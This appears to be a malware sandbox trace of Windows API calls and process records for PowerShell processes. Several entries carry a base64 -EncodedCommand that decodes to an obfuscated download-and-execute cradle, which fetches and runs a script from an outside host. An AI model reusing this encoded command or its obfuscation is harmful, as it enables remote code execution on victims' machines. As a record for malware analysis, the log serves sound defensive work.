	[0745.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c8bdfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0745.226] SetErrorMode (uMode=0x1) returned 0x1
	[0745.226] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c8be1f0 | out: lpFileInformation=0x1c8be1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0745.226] SetErrorMode (uMode=0x1) returned 0x1
	[0745.227] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0745.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0745.227] CoTaskMemFree (pv=0x44c170) 
	[0745.230] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0745.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0745.231] CoTaskMemFree (pv=0x44c170) 
	[0745.234] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0745.234] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0745.234] CoTaskMemFree (pv=0x44c170) 
	[0745.245] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0745.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0745.245] CoTaskMemFree (pv=0x44c170) 
	[0745.261] CoTaskMemAlloc (cb=0x3b) returned 0x1ba42f60
	[0745.261] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c8be3d8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8be3d8) returned 0x4550
	[0746.621] CoTaskMemFree (pv=0x1ba42f60) 
	[0746.624] GetConsoleWindow () returned 0x30272
	[0746.631] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0746.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0746.632] CoTaskMemFree (pv=0x44c170) 
	[0746.633] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0746.633] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0746.633] CoTaskMemFree (pv=0x44c170) 
	[0746.639] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0746.639] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0746.639] CoTaskMemFree (pv=0x44c170) 
	[0746.642] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c8be420 | out: pNumArgs=0x1c8be420) returned 0x3c0de0*=""
	[0746.643] lstrlenW (lpString="-EncodedCommand") returned 15
	[0746.644] CoTaskMemAlloc (cb=0x22) returned 0x1ba80fb0
	[0746.644] RtlMoveMemory (in: Destination=0x1ba80fb0, Source=0x3c0e02, Length=0x20 | out: Destination=0x1ba80fb0) 
	[0746.644] CoTaskMemFree (pv=0x1ba80fb0) 
	[0746.644] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0746.644] CoTaskMemAlloc (cb=0x2f4) returned 0x384c00
	[0746.644] RtlMoveMemory (in: Destination=0x384c00, Source=0x3c0e22, Length=0x2f2 | out: Destination=0x384c00) 
	[0746.644] CoTaskMemFree (pv=0x384c00) 
	[0746.645] LocalFree (hMem=0x3c0de0) returned 0x0
	[0746.646] CoTaskMemAlloc (cb=0x804) returned 0x1ba873c0
	[0746.646] GetConsoleTitleW (in: lpConsoleTitle=0x1ba873c0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0746.647] CoTaskMemFree (pv=0x1ba873c0) 
	[0746.656] CoTaskMemAlloc (cb=0x38e) returned 0x3c0de0
	[0746.656] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c8be380*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f3d968 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f3d968*(hProcess=0x360, hThread=0x39c, dwProcessId=0x1de0, dwThreadId=0x1ad4)) returned 1
	[0746.807] CoTaskMemFree (pv=0x3c0de0) 
	[0746.809] CloseHandle (hObject=0x39c) returned 1
	[0746.809] CoTaskMemAlloc (cb=0x3b) returned 0x1ba42f60
	[0746.809] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c8be428, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8be428) returned 0x4550
	[0746.810] CoTaskMemFree (pv=0x1ba42f60) 
	[0746.813] GetCurrentProcess () returned 0xffffffffffffffff
	[0746.813] GetCurrentProcess () returned 0xffffffffffffffff
	[0746.813] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x360, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8be508, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8be508*=0x39c) returned 1

Process:
	id = "89"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2ee7000"
	os_pid = "0x1144"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 464
	os_tid = 0x1148


Thread:
	id = 498
	os_tid = 0x124c


Thread:
	id = 503
	os_tid = 0x1260


Thread:
	id = 2115
	os_tid = 0x22e4


Thread:
	id = 2118
	os_tid = 0x1bb8


Thread:
	id = 2119
	os_tid = 0x2034


Process:
	id = "90"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x7c8f5000"
	os_pid = "0x115c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 467
	os_tid = 0x1160

	[0815.943] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0820.693] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0820.694] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0820.694] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0820.694] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0844.093] GetVersionExW (in: lpVersionInformation=0xed920*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xed920*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0844.096] GetVersionExW (in: lpVersionInformation=0xed920*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xed920*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0844.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0844.109] GetVersionExW (in: lpVersionInformation=0xed690*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xed690*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0844.110] SetErrorMode (uMode=0x1) returned 0x1
	[0844.111] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xed7f0 | out: lpFileInformation=0xed7f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0844.112] SetErrorMode (uMode=0x1) returned 0x1
	[0844.115] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xeda60 | out: lpdwHandle=0xeda60) returned 0x94c
	[0844.118] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c272d8 | out: lpData=0x2c272d8) returned 1
	[0845.167] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xed9d8, puLen=0xed9d0 | out: lplpBuffer=0xed9d8*=0x2c27374, puLen=0xed9d0) returned 1
	[0845.169] lstrlenW (lpString="䅁") returned 1
	[0845.179] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xed948, puLen=0xed940 | out: lplpBuffer=0xed948*=0x2c27450, puLen=0xed940) returned 1
	[0845.180] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0845.182] CoTaskMemAlloc (cb=0x2e) returned 0x2fbcd0
	[0845.182] lstrcpyW (in: lpString1=0x2fbcd0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0845.183] CoTaskMemFree (pv=0x2fbcd0) 
	[0845.183] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xed948, puLen=0xed940 | out: lplpBuffer=0xed948*=0x2c274a4, puLen=0xed940) returned 1
	[0845.183] lstrlenW (lpString="System.Management.Automation") returned 28
	[0845.183] CoTaskMemAlloc (cb=0x3c) returned 0x2b0c10
	[0845.183] lstrcpyW (in: lpString1=0x2b0c10, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0845.183] CoTaskMemFree (pv=0x2b0c10) 
	[0845.183] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xed948, puLen=0xed940 | out: lplpBuffer=0xed948*=0x2c27500, puLen=0xed940) returned 1
	[0845.184] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0845.184] CoTaskMemAlloc (cb=0x20) returned 0x301310
	[0845.184] lstrcpyW (in: lpString1=0x301310, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0845.184] CoTaskMemFree (pv=0x301310) 
	[0845.184] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xed948, puLen=0xed940 | out: lplpBuffer=0xed948*=0x2c27540, puLen=0xed940) returned 1
	[0845.184] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0845.184] CoTaskMemAlloc (cb=0x44) returned 0x2b0c10
	[0845.184] lstrcpyW (in: lpString1=0x2b0c10, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0845.184] CoTaskMemFree (pv=0x2b0c10) 
	[0845.184] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xed948, puLen=0xed940 | out: lplpBuffer=0xed948*=0x2c275a8, puLen=0xed940) returned 1
	[0845.184] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0845.184] CoTaskMemAlloc (cb=0x76) returned 0x29eaf0
	[0845.184] lstrcpyW (in: lpString1=0x29eaf0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0845.184] CoTaskMemFree (pv=0x29eaf0) 
	[0845.184] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xed948, puLen=0xed940 | out: lplpBuffer=0xed948*=0x2c27644, puLen=0xed940) returned 1
	[0845.184] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0845.184] CoTaskMemAlloc (cb=0x44) returned 0x2b0c10
	[0845.184] lstrcpyW (in: lpString1=0x2b0c10, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0845.185] CoTaskMemFree (pv=0x2b0c10) 
	[0845.185] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xed948, puLen=0xed940 | out: lplpBuffer=0xed948*=0x2c276a8, puLen=0xed940) returned 1
	[0845.185] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0845.185] CoTaskMemAlloc (cb=0x58) returned 0x2c1040
	[0845.185] lstrcpyW (in: lpString1=0x2c1040, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0845.185] CoTaskMemFree (pv=0x2c1040) 
	[0845.185] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xed948, puLen=0xed940 | out: lplpBuffer=0xed948*=0x2c27724, puLen=0xed940) returned 1
	[0845.185] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0845.185] CoTaskMemAlloc (cb=0x20) returned 0x301310
	[0845.185] lstrcpyW (in: lpString1=0x301310, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0845.185] CoTaskMemFree (pv=0x301310) 
	[0845.185] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xed948, puLen=0xed940 | out: lplpBuffer=0xed948*=0x2c273cc, puLen=0xed940) returned 1
	[0845.185] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0845.185] CoTaskMemAlloc (cb=0x66) returned 0x27c4b0
	[0845.185] lstrcpyW (in: lpString1=0x27c4b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0845.185] CoTaskMemFree (pv=0x27c4b0) 
	[0845.185] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xed948, puLen=0xed940 | out: lplpBuffer=0xed948*=0x0, puLen=0xed940) returned 0
	[0845.185] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xed948, puLen=0xed940 | out: lplpBuffer=0xed948*=0x0, puLen=0xed940) returned 0
	[0845.185] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xed948, puLen=0xed940 | out: lplpBuffer=0xed948*=0x0, puLen=0xed940) returned 0
	[0845.186] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xed918, puLen=0xed910 | out: lplpBuffer=0xed918*=0x2c27374, puLen=0xed910) returned 1
	[0845.187] CoTaskMemAlloc (cb=0x204) returned 0x2a19b0
	[0845.187] VerLanguageNameW (in: wLang=0x0, szLang=0x2a19b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0845.190] CoTaskMemFree (pv=0x2a19b0) 
	[0845.190] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\", lplpBuffer=0xed968, puLen=0xed960 | out: lplpBuffer=0xed968*=0x2c27300, puLen=0xed960) returned 1
	[0845.196] GetCurrentProcessId () returned 0x115c
	[0846.425] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xec890 | out: lpLuid=0xec890*(LowPart=0x14, HighPart=0)) returned 1
	[0846.429] GetCurrentProcess () returned 0xffffffffffffffff
	[0846.430] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xec8b0 | out: TokenHandle=0xec8b0*=0x2d0) returned 1
	[0846.431] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x2c2ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0846.433] CloseHandle (hObject=0x2d0) returned 1
	[0846.436] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x115c) returned 0x2d0
	[0846.447] EnumProcessModules (in: hProcess=0x2d0, lphModule=0x2c2abb8, cb=0x200, lpcbNeeded=0xed8c8 | out: lphModule=0x2c2abb8, lpcbNeeded=0xed8c8) returned 1
	[0846.450] GetModuleInformation (in: hProcess=0x2d0, hModule=0x13f370000, lpmodinfo=0x2c2ae28, cb=0x18 | out: lpmodinfo=0x2c2ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0846.451] CoTaskMemAlloc (cb=0x804) returned 0x3023b0
	[0846.451] GetModuleBaseNameW (in: hProcess=0x2d0, hModule=0x13f370000, lpBaseName=0x3023b0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0846.452] CoTaskMemFree (pv=0x3023b0) 
	[0846.453] CoTaskMemAlloc (cb=0x804) returned 0x3023b0
	[0846.453] GetModuleFileNameExW (in: hProcess=0x2d0, hModule=0x13f370000, lpFilename=0x3023b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0846.453] CoTaskMemFree (pv=0x3023b0) 
	[0846.454] CloseHandle (hObject=0x2d0) returned 1
	[0847.399] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x115c) returned 0x2d0
	[0847.400] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0xed9f8 | out: lpExitCode=0xed9f8*=0x103) returned 1
	[0847.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c2b088, Length=0x20000, ResultLength=0xed9c0 | out: SystemInformation=0x12c2b088, ResultLength=0xed9c0*=0x458a0) returned 0xc0000004
	[0847.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c4b0b8, Length=0x480a0, ResultLength=0xed9c0 | out: SystemInformation=0x12c4b0b8, ResultLength=0xed9c0*=0x458a0) returned 0x0
	[0848.401] EnumWindows (lpEnumFunc=0x23866ac, lParam=0x0) returned 1
	[0848.402] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.923] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x558
	[0849.923] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.923] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.923] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.923] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x538
	[0849.923] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
